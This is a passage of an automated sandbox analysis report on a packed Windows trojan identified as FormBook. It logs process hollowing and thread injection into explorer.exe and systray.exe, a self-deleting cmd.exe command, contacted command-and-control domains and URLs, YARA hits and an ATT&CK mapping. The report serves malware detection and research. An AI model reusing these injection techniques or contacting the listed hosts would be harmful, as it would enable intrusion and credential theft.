Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2990 mov eax, dword ptr fs:[00000030h]	17_2_045A2990
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459C182 mov eax, dword ptr fs:[00000030h]	17_2_0459C182
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA185 mov eax, dword ptr fs:[00000030h]	17_2_045AA185

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 13.59.53.244 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.granthamrobotics.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mclpay.com

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 3424	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 1C0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: FFD008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'			Jump to behavior

Source: explorer.exe, 0000000C.00000000.735084373.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.753363013.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Masquerading1	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Valid Accounts1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection812	Access Token Manipulation1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion31	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection812	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Deobfuscate/Decode Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Obfuscated Files or Information2	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Software Packing1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	34%	Virustotal		Browse
SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	36%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.0.AddInProcess32.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
11.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.c/gP	0%	Avira URL Cloud	safe
http://ns.d	0%	Avira URL Cloud	safe
http://www.granthamrobotics.com/sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://ns.adobe.cobjP	0%	Avira URL Cloud	safe
www.roamallday.com/sadn/	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://ns.ado/1P	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.mclpay.com/sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp	0%	Avira URL Cloud	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	13.59.53.244	true	false	high
granthamrobotics.com	34.102.136.180	true	false	unknown
www.stealthshop.net	74.220.199.6	true	false	unknown
www.mclpay.com	unknown	unknown	true	unknown
www.granthamrobotics.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.granthamrobotics.com/sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP	false	Avira URL Cloud: safe	unknown
www.roamallday.com/sadn/	true	Avira URL Cloud: safe	low
http://www.mclpay.com/sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobj	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.c/gP	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://ns.d	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652216791.0000000006A7E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobjP	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1P	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schema.org/WebPage	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731660422.0000000002780000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 0000000C.00000000.736993153.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731639609.0000000002751000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.59.53.244	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	United States		16509	AMAZON-02US	false
34.102.136.180	granthamrobotics.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432683
Start date:	10.06.2021
Start time:	16:57:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.Packed2.43183.29557.7257 (renamed file extension from 7257 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/2@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 13.9% (good quality ratio 12.8%) Quality average: 74.2% Quality standard deviation: 30%
HCA Information:	Successful, ratio: 97% Number of executed functions: 126 Number of non-executed functions: 157
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 92.122.145.220, 142.250.180.196, 204.79.197.200, 13.107.21.200, 13.64.90.137, 20.50.102.62, 20.75.105.140, 20.54.26.129, 67.26.81.254, 8.238.27.126, 8.241.78.254, 8.241.78.126, 8.238.30.126, 20.82.210.154, 92.122.213.194, 92.122.213.247, 20.82.209.183 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, www.google.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:58:06	API Interceptor	218x Sleep call for process: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
